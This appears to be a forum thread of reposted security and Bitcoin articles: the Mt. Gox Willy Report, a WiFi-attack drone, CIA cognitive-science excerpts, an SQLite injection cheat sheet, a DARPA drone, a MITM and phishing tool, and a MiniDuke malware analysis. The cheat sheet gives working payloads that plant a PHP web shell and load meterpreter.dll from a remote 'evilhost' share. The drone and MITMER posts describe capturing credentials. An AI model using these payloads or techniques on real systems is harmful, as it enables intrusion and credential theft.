but the majority of it. January was when things truly went awry for Mt. Gox; more and more withdrawals were getting stuck, and faced with information that JPY withdrawals (which had been instant until that point) were also getting unreasonably delayed, people began panic-buying their way out of Gox. Combined with Willy still being active, this caused the spread between Gox and other exchanges to get completely out of hand. At the pinnacle of it, on January 26th, Willy suddenly became inactive – and with it, the price retraced back to a more reasonable spread with the other exchanges. Shortly after – on February 3rd to be precise – it seemed as if Willy had begun to run in reverse, although with a slightly altered pattern: it seemed to sell around 100 BTC every two hours. The hourly chart shows this quite well; there was almost no other trading volume for two days straight, so we saw a very straight declining slope on the chart. It didn’t take long for reverse-Willy to increase its pace. More than likely, the entire dump down to double digits was the handy work of this dumping bot. Peter R, another trader, came to the same conclusion independently from me in his excellent analysis that may just be very close to the truth. It would be one explanation for why none of the Willy accounts had a final balance despite all of their buying and no trace of BTC withdrawals: they were all dumped back on the market. The volume numbers seem to roughly match up. Where did the fiat go then? Into Mt. Gox’s reported fiat assets, possibly. You may remember they all but halted JPY withdrawals in early January, yet somehow cleared ALL pending JPY withdrawals the day they shut down in late February. This proves their original reason for the delays (currency conversion issues) were BS; they simply had no fiat left. Yet somehow they had enough fiat for withdrawals the day they shut down, which was after the dumping already started. But, again, speculation. There’s some additional evidence on the chart that a dump bot may have been at play. At several points in time, starting from Feb. 18th, it seemed that some bot was programmed to sell down to various fixed price levels. The most obvious cases are shown in these images. From Feb. 18th (top) and from Feb. 19th (bottom): every time someone put a bid at or above USD $248.15 and $261.2239, respectively, it would get dumped into at most a few minutes later (see e.g. this post from someone who noticed the same thing). These seem like random price-points at first, but at that point in time, $248.15 corresponded to exactly JPY 26000, and $261.2239 corresponded to exactly EUR 195. But here’s the kicker: NONE of the sell dumps were performed in their respective currency pairs; ALL were in USD. It suggests that whoever was selling (1) had some way to convert USD to JPY/EUR in a frictionless way, and/or (2) needed these currencies to be at a fixed price for some reason. After reading this log about possible insider trading from anarchystar, who is closely involved in the Mt. Gox legal proceedings, (2) may in fact have been the purpose: perhaps Mt. Gox was offering a fixed buy-in price for JPY or EUR-based investors. In either case, only Mt. Gox executing these sell trades makes sense. Furthermore, in an IRC log where someone was impersonating MagicalTux by hijacking his nick, Charlie Shrem asks if he needs some liquidity. This was at a time withdrawals were already halted. Clearly, Mt. Gox was accepting fiat injections – it seems reasonable to assume this liquidity came in the form of cheap BTC being bought. Additional factoid: a month or two ago, someone put up a site that aggregated the data from the leaked DB and allowed one to traverse the data easily, with rankings for best and worst traders, etc. One page of it is archived here. It had the (undoubtedly ironically intended) domain name “mark-karpeles.com”. It seems the site was fairly quickly removed, and “mark-karpeles.com” now redirects directly to the official mtgox.com. Barring an unlikely sudden change of heart by the creator from trying to expose fraud at Mt. Gox to supporting it, somebody may have threatened legal action or paid big bucks to get it under their control. In other words, someone was pretty desperate to prevent the data from becoming public. The Effect on the Bitcoin Price So how did all of this trading activity affect the price of Bitcoin as a whole? The answer is, unfortunately, enormously. I will be placing some historical charts from bitcoincharts.com along the Markus and Willy trade data where buying was most aggressive, which is basically from 15:14, July 28th, 2013 until the end of November. You can double-check exactly when and how many coins were bought using the logs near the top of this report, and/or match them against historical trading data from Mt. Gox’s public API. All of these trades actually occurred. The huge volume spike on July 28 15:14 is where the big buying starts. 15,000 coins get bought in the span of 30 minutes. According to the trade data, buying continues until the 31st, 15:55. After a four day pause, there’s some small buying on August 5th, but it really picks up again on the 12th at 21:32. Buying continues on-and-off, with some large spikes especially on the 19th, 27th and the 30th, where ten of thousands of coins are bought. Basically, all the huge green volume spikes in the above chart are the handiwork of Markus, and Markus alone. Something for the TA people: Note the date, which is the moment we broke the post-April bubble downtrend. In September, a few thousand coins were bought on the 2nd and 3rd, and then nothing until a lot was bought on the 9th, then on the 11th through early 13th. In the period of inactivity, the price finally got the chance to correct from an overbought condition. Unsurprisingly, price rose again when Markus resumed buying, then started falling again when Markus stopped on the 13th. There was no activity from Markus until late 26th/early 27th, where Markus made his final buys before handing the baton over to Willy, who would in turn continue aggressive, but much more constant, buying until early October 1st. Again, the price reflected this activity perfectly. Then came October, with the Silkroad shutdown crash on the 2nd. Price was flat for a while – because Willy did not become active until 10-10-2013 0:49. Now, unlike Markus, Willy’s buying was a lot more spread out over time. Markus was active sporadically, buying thousands or tens of thousands of coins in bursts, whereas Willy was active almost constantly, (at first) buying anywhere from 1 to 50 BTC at ~5-10 minute intervals. But even Willy would sometimes have gaps of inactivity (usually a day or less). These show up nicely in the chart. Willy was not active for most of the 15th and not active for about 14 hours on the 22nd. Price goes flat in these intervals. On 24-10-2013 14:24, Willy becomes inactive for exactly a week, until 31-10-2013 14:44. As though perfectly timed, price crashes and growth stagnates. Finally, November. Willy continues buying at its ~1-50 BTC per ~5-10 minutes rate until 5-11-2013 7:48. From 5-11-2013 10:53, Willy ups the ante – ~10-100 BTC is now bought at ~5-10 minute intervals, with many bursts of hundreds or thousands of BTC being bought at once. This continues non-stop until 9-11-2013 16:51. Willy becomes inactive for two days. Price crashes as if on cue. From 11-11-2013 14:04, Willy is back at its original pace, with occasional 100-1000+ BTC buys, until 16-11-2013 13:31. Short Willy inactivity until 17-11-2013 2:57, with inevitable growth stagnation. Then relatively stable buying until 23-11-2013 8:35. A day of inactivity, cue price decline. Re-acivation on 24-11-2013 9:16. Cue price growth. The 100-1000+ BTC buy bursts finally end on 28-11-2013 15:10, where Willy enters its final stage that we all recognized (~10-20 BTC every ~5-10 minutes). The reduced activity causes growth stagnation. And we all know what happened next. In closing I want to make clear that this report is not intended to make accusations, but rather to show the facts that can be extracted from the information that is available to the public, and stipulate that there is more than plenty of evidence to suspect that what happened at Mt. Gox may have been an inside job. What I hope to achieve by releasing this analysis into the wild is for the public to learn the truth behind what happened at Mt. Gox, how it affected the Bitcoin price, and hopefully for the individuals responsible for the massive fraud that occurred at Mt. Gox to be put to justice. Although the evidence shown in this report is far from conclusive, it can hopefully spur a more rigorous investigation into Mt. Gox’s accounting data, both by the public (using the leaked data) and the authorities (forensic investigation on the actual data). It needs to be recognized that, whether intentional or not (though plausible ignorance only goes so far), Mt. Gox has effectively been abusing Bitcoin to operate a Ponzi scheme for at least a year. The November “bubble” well into the $1000?s – and possibly April’s as well – was driven by hundreds of millions of dollars of fake liquidity pumped into the market out of thin air (note that this is equivalent to “with depositors’ money”). It is only natural that the Bitcoin price would deflate for around 5 months since its December peak, since there was never enough fiat coming in to support these kind of prices in the first place. In the interest of full disclosure: I’ve known of everything I wrote in this report since basically a day after the database was leaked, well over 2 months ago. I’m sure there are at least some other people that knew about it – I mean, it’s there in plain sight, in publicly available data, so it surprises me that no one else has come out with it until now. I specifically waited for the Goxless, free market to finally break the ongoing downtrend on its own strength before releasing it. Barring similar shenanigans at other exchanges (looking at you China) I think this means we may be at a “fair” valuation now, and that this knowledge will not hurt the price all that much. That said, despite everyone’s expectations, it seems unlikely that there will be another huge “bubble”, seeing as they were never “real” in the first place. Hopefully, price can rise at a more controlled pace as more and more good news comes out; it will be much better for Bitcoin as a technology than the crazy volatility and outrageous valuations we’ve seen last year. Sursa: The Willy Report: proof of massive fraudulent trading activity at Mt. Gox, and how it has affected the price of Bitcoin | The Willy Report
  17. Project “AirCrack1? : Warflying May 24, 2014 17:37 | 8 Comments | Xavier If we can put the business and some fun together, so why the hesitation? For a while, I’m playing with flying toys. I already played with different models of RC helicopters and recently, I switched to another category: I bought a quadcopter. The idea to mix the technology of drones with WiFi audits popped up in my mind for a while. First of all, this is not something news. Darren from Hak5 had the same crazy idea before me (see the episode 1520). But there is a difference between watching a cool video and doing the same in real life. Thus, I decided to experiment the same! And if I could use it to perform WiFi assessments or pentest, it’s even more cool! My choice was the DJI Phantom FC40. Phantom’s are great quadcopters. Very easy to pilot using the built-in Naza-M V2 module and they are able to cary stuff! In most cases, drones cary a camera but pretty much any other type of goods can be carried (even pizza ;-). And which device is the best choice to play with WiFi networks? A Pineapple of course! I’ve a Mark5 (the latest generation) and trust me, it is uber cool… What else do you need? Some power Internet connectivity To connect to Internet, I’m using a USB 3G modem with a data-only SIM card. The Mark5 supports out of the box common 3G devices. To provide power, my initial idea was to use the drone battery but the risk to have electromagnetic issues between the drone and the Pineapple was too high. Thus, I choose to use a dedicated battery (and this won’t affect the drone autonomy!). First, I used a Pineapple Juice 1800 battery but I was afraid of the weight and volume. I decided to go to another type of battery: a LiPo 900. LiPo batteries are very common in the aeromodelling landscape and have an excellent ratio weight/size VS performance. This battery is enouh for flying arround and sniffing for some traffic. To connect the Lipo to the Pineapple, a simple cable to convert the LiPo connector to a “jack” connector is required. If the goal is to fly the drone to your target, land on a roof and spend more time overthere, i think that I’ll use the Pineapple juice model. To be investigated… The choice of the DJI Phantom “FC40” was very important. Why? This model operates at 5.8gHz for communication between itself and its remote controller. This frees up the classic 2.4gHz band used by the camera to communicate via WiFi with a smartphone (to provide the FPV or “First Person View“). The Pineapple uses the same band and will not interfere with the remote controller. The total weight to cary (Pineapple, USB Modem, LiPo battery and cables) is 225 grams. This is totally acceptable for a Phantom! Everything fits under the drone and is secured with Velcro bands. I was afraid of the gravity center but it fits perfectly! The following pictures show you the Phantom ready to fly: Another issue could be the sensitivity of the drone while flying. Two important things to keep in mind: By carying more stuff, you add weight and this may affects the pilot’s sensations (ask this to pilot of helicopters!) By carying electronic devices, you increase the risk of electromagnetic perturbations. A good example is antennas which are located along the landing legs (GPS & remote controller). The drone found its GPS position as usual and was able to fly safely, keeping its position thoughout the flight. I just had the feeling that the drone was a little bit slower to respond. Of course the autonomy is greatly reduced. How to keep an eye on the WiFi tools? The PineApple has built-in support for autossh. When it boots, it connects to Internet via the 3G modem and SSH to one of my servers and establish a remote tunnel with the “-R” flag. With this technique, I’m able to connect safely to the PineApple and follow the operations directly on my iPhone screen as seen on the following picture. It’s very difficult to keep an eye on the drone and on the screen at the same. I would recommend two persons to conduct the attack: the pilot and a “WiFi operator” (with a classic laptop for more conviviality) This was a successful experience! Data was captured without problem. My Pineapple config is the following: wlan0 : karma + sslstrip (to capture credentials) wlan1 : airodump (to capture traffic for later use) Of course, all the attacks that can be launched from a Pineapple can be done from the sky! Think about the WiFi jammer infusion ;-). What’s next?My plans are to script some kind of “flying scanner” which will detect and connect to open networks to perform a Nmap scan. Disclaimer: this is done for research purposes only and it’s better to have a “Get Out of Jail” card if you use this setup in pentests… Sursa: Project “AirCrack1? : Warflying | /dev/random
  18. Thinking & Writing : The CIA’s Guide to Cognitive Science & Intelligence Analysis This CIA Monograph (re-released in 2010 by Robert Sinclair) presents “the implications of growing knowledge in the cognitive sciences for the way the intelligence business is conducted – in how we perform analysis, how we present our findings, and even its meaning for our hiring and training practices ”. In other words, this paper is about, “thinking and writing [and] the complex mental patterns out of which writing comes, their strengths and limitations, and the challenges they create, not just for writers but for managers”. Below are some curated excerpts. P.S. Don’t confuse this paper with the popular CIA book, “Psychology of Intelligence Analysis” which I have linked to in the past. This paper draws upon similar cognitive research but has a different focus (mainly that of communicating clearly). Introduction Two quotations sum up what this essay is about: “Our insights into mental functioning are too often fashioned from observations of the sick and the handicapped. It is difficult to catch and record, let alone understand, the swift flight of a mind operating at its best.” “A writer in the act is a thinker on a full-time cognitive overload.” “In brief, I hope to describe some of the powerful metaphors about the workings of our minds that have developed over the past couple of decades.” “…although this essay talks a lot about writing, it is not designed to deal with the how-to-write issue. As the title indicates, its topic is thinking and writing the complex mental patterns out of which writing comes, their strengths and limitations, and the challenges they create, not just for writers but for managers.” “I would argue that the elements of cognitive science highlighted in the monograph are still the ones of first-order relevance for the DI. I do not think an intelligence analyst will gain much professionally from knowing how neurons fire or which parts of the brain participate in which mental operations. I do consider it essential, however, that we be aware of how our brains ration what they make available to our conscious minds as they cope with the fact that our “ability to deal with knowledge is hugely exceeded by the potential knowledge contained in man’s environment.” Not only do they select among outside stimuli, they also edit what they let us know about their own activities. This is the focus of the monograph.” “For every analyst and every reviewer in this serial process, the analysis starts from a body of analogies and heuristics that are unique to that individual and grow out of his or her past experience after images of ideas and events that resonate when we examine a current problem, practical rules of thumb that have proven useful over time.The power of this approach is incontestable, but we are all too easily blinded to its weaknesses. The evidence is clear: analysis is likely to improve when we look beyond what is going on in our own heads—when we use any of several techniques designed to make explicit the underlying structure of our argument and when we encourage others to challenge our analogies and heuristics with their own. Little about the current process fosters such activities, it seems to me; they would be almost unavoidable in a collaborative environment.” On Writing “If the very act of writing puts a writer any writer at all—into “full-time cognitive overload,” then perhaps we would benefit from a better understanding of what contributes to the overload.” “The novelist and poet Walker Percy offers a concept that may be even more fruitful. In a series of essays dealing with human communication, Percy asserts that a radical distinction must be made between what he calls “knowledge” and what he calls “news.” Percy’s notion takes on added significance in light of the findings of cognitive science (of which he seems largely unaware), and I will be discussing it at greater length in due course. For the present “I would simply assert that the nature of our work forces us to swing constantly back and forth be- tween knowledge and news, and I believe cognitive science has something to contribute to our under- standing of the problem. “ Why We Use Heuristics / Mental Shortcuts In Decision Making “What is it about heuristics that makes them so useful? First, they are quick and they get the job done, assuming the experiential base is sufficient and a certain amount of satisficing is not objectionable. Second, what cognitive scientists call the problem-space remains manageable. Theoretically that space becomes unmanageably large as soon as you start to generalize and explore: any event may be important now, any action on your part is possible, and you could get paralyzed by possibilities as the centipede did. But humans constantly narrow the problem-space on the basis of their own experience. And most of the time the results are acceptable: what more efficient way is there to narrow an indefinitely large problem-space? ” Limits To Using Heuristics / Mental Shortcuts In Decision Making “Heuristics are inherently conservative; they follow the tried-and-true method of building on what has already happened. When the approach is confronted with the oddball situation or when someone asks what is out there in the rest of the problem-space, heuristics begin to flounder. Yet we resist using other approaches, partly because we simply find them much less congenial, partly because the record allows plausible argument about their effectiveness when dealing with an indefinitely large set of possibilities.” “As most people use them, heuristics are imprecise and sloppy. Some of the reasons why cognitive activity is imprecise were noted earlier; another reason is the tendency to satisfice, which encourages us to go wherever experience dictates and stop when we have an adequate answer. With perseverance and sufficient information one can achieve considerable precision, but there is nothing in the heuristic approach itself that compels us to do so and little sign that humans have much of an urge to use it in this way. Most of the time, moreover, the information is not terribly good. We then may find ourselves trying to get more precision out of the process than it can provide.” “In everyday use, heuristics are not congenial to formal procedures such as logic, probability, and the scientific method. This fact helps explain why we rarely use logic rigorously, why we tend to be more interested in confirming than in disconfirming a hypothesis, and why we are so poor at assessing odds.” We Can’t Talk About Mental Shortcuts Without Talking About Memory & “Chunking” “It should be apparent the heuristic approach is critical to the effectiveness of our conscious mental activity, since short-term memory needs procedures like heuristics that narrow its field of view. On the other hand, the drawbacks are equally apparent. The ability to process large quantities of information is always an advantage and sometimes a necessity. How can we operate effectively if we can consider so little at a time? The answer to this question lies in the speed and flexibility with which we can manipulate the information in short-term memory; to use the terminology, in our chunking prowess.” Accessed via Robert Sinclair’s Overview of Cognitive Science & Intelligence (written for the CIA) A chunk, it should be clear, equates to one of the roughly seven entities that short-term memory can deal with at one time. Hunt’s formulation notwithstanding, it need not be tied to words or discrete symbols. Any conceptual entity—from a single letter to the notion of Kant’s categorical imperative- can be a chunk. And not only do we work with chunks that come to us from the outside world, we create and remember chunks of our own. Anything in long-term memory probably has been put there by the chunking process. We build hierarchies of chunks, combining a group of them under a single conceptual heading (a new chunk), “filing” the subordinate ideas in long-term memory, and using the overall heading to gain access to them. We can manipulate any chunk or bring wildly differing chunks together, and we can do these things with great speed and flexibility. “In some ways “chunk” is a misleading term for the phenomenon. The word calls to mind something discrete and hard-edged, whereas the very essence of the phenomenon is the way we can give it new shapes and new characteristics, and the way conceptual fragments interpenetrate each other in long-term memory. A chunk might better be conceived of, metaphorically, as a pointer to information in long-term memory, and the information it retrieves as a cloud with a dense core and ill-defined edges. The mind can store an enormous number of such clouds, each overlapping many others.This “cloudiness” the way any one concept evokes a series of others is a source of great efficiency in human communication; it is what lets us get the drift of a person’s remarks without having all the implications spelled out. But it can also be a source of confusion.” Heuristics/ Mental Shortcuts & “Chunking” Work Hand in Hand During Decision Making “Heuristics—non-random exploration that uses experience and inference to narrow the field of possibilities—loom large in the development of each individual and are deeply ingrained in all of us (particularly when we are doing some- thing we consider important). Combined with the chunking speed of short-term memory, the heuristic approach is a powerful way to deal with large amounts of information and a poorly defined problem space.“ “But there is always a tradeoff between range and precision. The more of the problem space you try to explore—and the “space,” being conceptual rather than truly spatial, can have any number of dimensions—the harder it is to achieve a useful degree of specificity. Talent and experience can often reduce the conflict between the need for range and the need for precision, but they cannot eliminate it. We almost always end up satisficing.” “We are compulsive, in our need to chunk, to put information into a context. The context we start with heavily conditions the way we receive a new piece of information. We chunk so rapidly that “the problem,” whatever it is, often has been sharply delimited by the time we begin manipulating it in working memory.“ “Although the conceptual network formed through years of experience may make an individual a more skillful problem-solver, it can also make him or her less open to unusual ideas or information—a phenomenon sometimes termed “hardening of the categories.” The conservative bias of the heuristic approach—the tendency we all share of looking to past experience for guidance—makes it easy for an old hand to argue an anomaly out of the way. In fact the old hand is likely to be right nearly all the time; experience usually does work as a model. But what about the situation when “nearly all the time” isn’t good enough? Morton Hunt recounts an instance of a computer proving better than the staff of a mental hospital at predicting which patients were going to attempt suicide.” Cognitive Aspects of Speaking & Writing Here are some of the ways in which writing and speech differ: “With speech, much of the communication takes place in ways that do not involve words: in gesture, in tone of voice, in the larger context surrounding the exchange. Speech is a complex audio-visual event, and the implications we draw—the chunks we form—are derived from a whole network of signals. With writing there is nothing but the words on the paper. The result may be as rich as with speech—nobody would accuse a Shakespeare sonnet of lacking richness—but the resources used are far narrower.” “Writing calls for a sharper focus of attention on the part of both producer and receiver. When you and I are conversing, we both can attend to several other things—watching the passing crowd, worrying about some aspect of work, waving away a passing insect—and still keep the thread of our discourse. If I am writing or reading I must concentrate on the text; these other activities are likely to register as distractions.” “The pace and pattern of chunking is very different in the two modes. With speech, one word or phrase quickly supersedes the last,and the listener cannot stop to ponder any of them. What he ponders is the chunk he forms from his perception of everything the speaker is saying, and he is not likely to ponder even that very intensively. He does have the opportunity to ask the speaker about what he has heard (an opportunity almost never available to a reader), but he rarely does so; the spoken medium has enormous forward momentum. In compensation, speech uses a much narrower set of verbal formulae than writing. It relies heavily on extralinguistic cues, and by and large it is more closely tied to a larger context that helps keep the participants from straying too far from a common understanding. In the written medium, by contrast, the reader can chunk more or less at his own pace. He can always recheck his conclusion against the text, but he has little recourse beyond that. All the signals a writer can hope to send must be in the written words.” “A reader is dealing with a finished product: the production process has been essentially private. A listener is participating in a transaction that is still in progress, a transaction that is quintessentially social.” “Partly because of the factors listed so far, writing is capable of more breadth and more precision than speech. Neither complex ideas nor complex organizations would be possible without writing. My own impression is that even in this television-dominated era, people attach more solidity and permanence to something written than to something spoken. Perhaps we have an ingrained sense that the products of speech are more ephemeral than the products of writing. But to achieve this aura of permanence writing sacrifices a sense of immediacy. A writer tends to speak with the voice of an observer, not a participant.” Communicating Knowledge vs News “…. I am building toward an assertion that…..there are correlations between news and the cognitive processes involved in speech on the one hand, and between knowledge and the cognitive processes involved in writing on the other.” Knowledge = “all the scientific and formal statements, all the generalizations, and also all the poetry and art. Producers of such statements are alike in their withdrawal from the ordinary affairs of life to university, laboratory, studio, mountain eyrie, where they write sentences to which other men assent (or refuse to assent), saying, “Yes, this is indeed how things are.”” News = “statements that are significant precisely insofar as the reader is caught up in the affairs and in the life of the island and insofar as he has not withdrawn into laboratory or seminar room.” You can categorize knowledge vs news using the following filters: “Nature of the sentence. Knowledge can in theory be arrived at “anywhere by anyone and at any time”; news involves a nonrecurring event or state of affairs which bears on the life of the recipient.” “Posture of the reader. The reader of a piece of knowledge stands “outside and over against the world;” the reader of a piece of news is receiving information relevant to his specific situation.” “Scale of Evaluation. We judge knowledge ac- cording to the degree it achieves generality; we judge news according to its relevance to our own predicament.” “Canons of acceptance. We verify knowledge either experimentally or in light of past experi- ence. News is “neither deducible, repeatable, nor otherwise confirmable at the point of hear- ing.” We react to it on the basis of its relevance to our predicament, the credentials of the newsbearer (according to Percy, “a piece of news requires that there be a newsbearer”), and its plausibility.” “Response of the reader. A person receiving a piece of knowledge will assent to it or reject it; a person receiving a piece of news will take action in line with his evaluation of the news. (And, I would add, the receiver of a piece of news is more immediately concerned than the reader of a piece of knowledge with the correctness of the information.)” Continue Reading: Thinking & Writing – The CIA’s Guide to Cognitive Science & Intelligence Analysis Sursa: SimoleonSense | Thinking & Writing : The CIA’s Guide to Cognitive Science & Intelligence Analysis
  19. SQLite3 Injection Cheat Sheet posted May 31, 2012, 9:39 PM by Nickosaurus Hax [TABLE=class: sites-layout-name-one-column sites-layout-hbox] [TR] [TD=class: sites-layout-tile sites-tile-name-content-1]Introduction A few months ago I found an SQL injection vulnerability in an enterprisey webapp's help system. Turns out this was stored in a separate database - in SQLite. I had a Google around and could find very little information about exploiting SQLI with SQLite as the backend.. so I went on a hunt, and found some neat tricks. This is almost entirely applicable only to webapps using SQLite - other implementations (in Adobe, Android, Firefox etc) largely don't support the tricks below. Cheat Sheet [TABLE=width: 1] [TR] [TD=align: left] Comments[/TD] [TD=align: left] --[/TD] [/TR] [TR] [TD=align: left] IF Statements[/TD] [TD=align: left] CASE[/TD] [/TR] [TR] [TD=align: left] Concatenation[/TD] [TD=align: left] ||[/TD] [/TR] [TR] [TD=align: left] Substring[/TD] [TD=align: left] substr(x,y,z)[/TD] [/TR] [TR] [TD=align: left] Length[/TD] [TD=align: left] length(stuff)[/TD] [/TR] [TR] [TD=align: left] Generate single quote[/TD] [TD=align: left] select substr(quote(hex(0)),1,1);[/TD] [/TR] [TR] [TD=align: left] Generate double quote[/TD] [TD=align: left] select cast(X'22' as text);[/TD] [/TR] [TR] [TD=align: left] Generate double quote (method 2)[/TD] [TD=align: left] .. VALUES (“<?xml version=“||””””||1||[/TD] [/TR] [TR] [TD=align: left] Space-saving double quote generation[/TD] [TD=align: left] select replace("<?xml version=$1.0$>","$",(select cast(X'22' as text)));[/TD] [/TR] [/TABLE] For some reason, 4x double quotes turns into a single double quote. Quirky, but it works. Getting Shell Trick 1 - ATTACH DATABASE What it says on the tin - lets you attach another database for your querying pleasure. Attach another known db on the filesystem that contains interesting stuff - e.g. a configuration database. Better yet - if the designated file doesn't exist, it will be created. You can create this file anywhere on the filesystem that you have write access to. PHP example: ?id=bob’; ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘<? system($_GET[‘cmd’]); ?>’;-- Then of course you can just visit lol.php?cmd=id and enjoy code exec! This requires stacked queries to be a goer. Getting Shell Trick 2 - SELECT load_extension Takes two arguments: A library (.dll for Windows, .so for NIX) An entry point (SQLITE_EXTENSION_INIT1 by default) This is great because This technique doesn't require stacked queries The obvious - you can load a DLL right off the bat (meterpreter.dll? Unfortunately, this component of SQLite is disabled in the libraries by default. SQLite devs saw the exploitability of this and turned it off. However, some custom libraries have it enabled - for example, one of the more popular Windows ODBC drivers. To make this even better, this particular injection works with UNC paths - so you can remotely load a nasty library over SMB (provided the target server can speak SMB to the Internets). Example: ?name=123 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- This works wonderfully Other neat bits If you have direct DB access, you can use PRAGMA commands to find out interesting information: PRAGMA database_list; -- Shows info on the attached databases, including location on the FS. e.g. 0|main|/home/vt/haxing/sqlite/how.db PRAGMA temp_store_directory = '/filepath'; -- Supposedly sets directory for temp files, but deprecated. This would’ve been pretty sweet with the recent Android journal file permissions bug. Conclusion / Closing Remarks SQLite is used in all sorts of crazy places, including Airbus, Adobe, Solaris, browsers, extensively on mobile platforms, etc. There is a lot of potential for further research in these areas (especially mobile) so go forth and pwn! [/TD] [/TR] [/TABLE] Sursa: https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet
  20. [h=1]DARPA Unveils Hack-Proof Drone[/h] by Kris Osborn on May 21, 2014 The Pentagon’s research arm unveiled a new drone built with secure software that prevents the control and navigation of the aircraft from being hacked. The program, called High Assurance Cyber Military Systems, or HACMS, uses software designed to thwart cyber attacks. It has been underway with the Defense Advance Research Project Agency for several years after originating at the University of California, San Diego and the University of Washington, said Kathleen Fischer, HACMS program manager for DARPA. “The software is designed to make sure a hacker cannot take over control of a UAS. The software is mathematically proven to be invulnerable to large classes of attack,” Fisher said. The mini drone is engineered with mathematically assured software making it invulnerable to cyber attack. Citing the success of mock-enemy or “red-team” exercises wherein cyber experts tried to hack into the quadcopter and failed, Fisher indicated that DARPA experts have referred to the prototype quadcopter as the most secure UAS in the world. “We started out with the observation that many vehicles are easy for malicious hackers to tamper with the software and take control remotely. We’ve replaced all the software with our high assurance software that was developed using the tools and techniques that were invented in the program,” Fisher said. The drone prototype was among more than 100 projects and 29 advanced research programs on display in the Pentagon’s courtyard Wednesday in what was billed as DARPA Demo Day. The HACMS program develops system architecture models, software components and operating system software, DARPA officials said. Vulnerabilities or security issues can arise when drones or other military aircraft are “networked” to one another such that they can share information in real time. Security risks can emerge through network protocols, software bugs or unintended interactions between otherwise correct components, DARPA officials explained. “Many things have computers inside and those computers are networked to talk to other things. Whenever you have that situation, you have the possibility for remote vulnerabilities where somebody can use the network connection to take over and get the device to do what the attacker wants instead of what the owner wants,” Fisher explained. The software tools used for the HACMS program can be adjusted to larger platforms. In fact, DARPA plans to transition the secure software to Boeing’s Unmanned Little Bird helicopter, DARPA officials said. “The software is foundational so it could be used for a large number of systems,” Fisher added. Sursa: http://defensetech.org/2014/05/21/darpa-unveils-hack-proof-drone/
  21. [h=2]MITMER- MITM Testing Tool[/h] Securing the traffic in your network is important to prevent MITM attack that can be used to sniff sensitive information on your network. Some users may require to open sensitive portals of the office to make their work remotely without verifying the security of the network used. if you need to use non trusted network you should enable the VPN to make sure that all your traffic goes encrypted. On the other hand if you decided to run a penetration testing on network then you can use several tools that allows to conduct Man in the middle attack testing and one of them is MITMER. the tool allows to have the following: MITM attack on a specific host or all LAN hosts. Show HTTP and DNS activity of attacked hosts. Fake DNS queries asking about some website and redirects them to your PC. Covert that website into a fake page and host it on your PC. Reveal entered credentials into that fake page. The tool is written in python using Scapy and allows to run ARP or DNS spoofing to redirect users to phishing website and have their credential for GMAIL, Twitter, Facebook or other online service. you can download the tool from this website: https://github.com/husam212/MITMer Sursa: MITMER- MITM Testing Tool | SecTechno
  22. [h=3]PortEx[/h] [h=3]Welcome to PortEx[/h] PortEx is a Java library for static malware analysis of portable executable files. PortEx is written in Java and Scala, but targeted for Java applications. [h=3]Features (so far)[/h] Reading Header information from: MSDOS Header, COFF File Header, Optional Header, Section Table Dumping of: MSDOS Load Module, Sections, Overlay, embedded ZIP, JAR or .class files Mapping of Data Directory Entries to the corresponding Section Reading Standard Section Formats: Import Section, Resource Section, Export Section, Debug Section Scanning for file anomalies, including usage of deprecated, reserved or wrong values Scan for PEiD signatures or your own signature database Scan for jar2exe or class2exe wrappers Scan for Unicode and ASCII strings contained in the file Overlay detection Get a Virustotal report For more information have a look at PortEx Wiki and the Documentation Sursa: https://katjahahn.github.io/PortEx/
      • 1
      • Upvote
  23. At the end of April Microsoft announced that a vulnerability in Word was actively being exploited. This vulnerability occurred in parsing RTF files and was assigned CVE-2014-1761, a thorough analysis of which can be found on the HP Security Research blog. We have since seen multiple cases where this exploit is used to deliver malware and one was particularly interesting as it contained a new variant of MiniDuke (also known as Win32/SandyEva). MiniDuke was first discussed by Kaspersky in March 2013 in their paper The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoorand shortly after in a paper by Bitdefender. Some of the characteristics of MiniDuke — such as its small size (20 KB), its crafty use of assembly programming, and the use of zero-day exploits for distribution — made it an intriguing threat. Although the backdoor is still quite similar to its previous versions, some important changes were made since last year, the most notable being the introduction of a secondary component written in JScript to contact a C&C server via Twitter. The RTF exploit document The exploit document was named Proposal-Cover-Sheet-English.rtf and is quite bland when compared to the documents that were used in 2013, which were of a political nature. We received the document on April 8th, only three days after the compilation of the MiniDuke payload, dated April 5th in the PE header. The payload remains quite small at only 24 KB. The functionality of the shellcode which is executed by triggering the vulnerability is rather simple and straightforward. After decrypting itself and obtaining the addresses of some functions exported by kernel32.dll, it decrypts and drops the payload in the %TEMP% directory in a file named “a.l” which is subsequently loaded by calling kernel32!LoadLibraryA. An interesting thing about the shellcode is that before transferring control to any API function it checks the first bytes of the function in order to detect hooks and debugger breakpoints which may be set by security software and monitoring tools. If any of these are found the shellcode skips the first 5 bytes of the function being called by manually executing prologue instructions (mov edi, edi; push ebp; mov ebp, esp) and then jumping to the function code as illustrated below. The next graph presents the execution flow of this malware when the exploitation is successful. As mentioned previously this version of the MiniDuke payload comes with two modules which we refer to as the main module and the TwitterJS module. Execution flow of MiniDuke [h=1]Main Component[/h] [h=2]Installation[/h] Once MiniDuke receives control it checks that the host process is not rundll32.exe and whether the current directory is %TEMP%. If either of those conditions is met the malware assumes it is run for the first time and it proceeds with its installation onto the system. MiniDuke gathers information about the system and encrypts its configuration based on that information, a method also used by OSX/Flashback (this process is called watermarking by Bitdefender). The end result is that it is impossible to retrieve the configuration of an encrypted payload if analyzing it on a different computer. The information collected on infection has not changed since the previous version and consists of the following values: volume serial number (obtained from kernel32!GetVolumeInformationA) CPU information (obtained with the cpuidinstruction) computer name (obtained from kernel32!GetComputerNameA) Once the encrypted version of the malware is created, it is written into a file in the %ALLUSERSPROFILE%\Application Data directory. The name of the file is randomly picked from the following values (you can find this listing and those of the next screenshots on the VirusRadar description: The filename extension is also picked randomly from the following list: To persist on the infected system after reboots, the malware creates a hidden .LNK file in the “Startup” directory pointing to the modified main module. The name of the .LNK file is randomly drawn from the following values: The .LNKfile is created using a COM object with the IShellLinkA interface and contains the following command: “C:\Windows\system32\rundll32.exe %path_to_main_module%, export_function” Which gives something like: “C:\Windows\system32\rundll32.exe C:\DOCUME~1\ALLUSE~1\APPLIC~1\data.cat, IlqUenn“. [h=2]Operation[/h] When the malware is 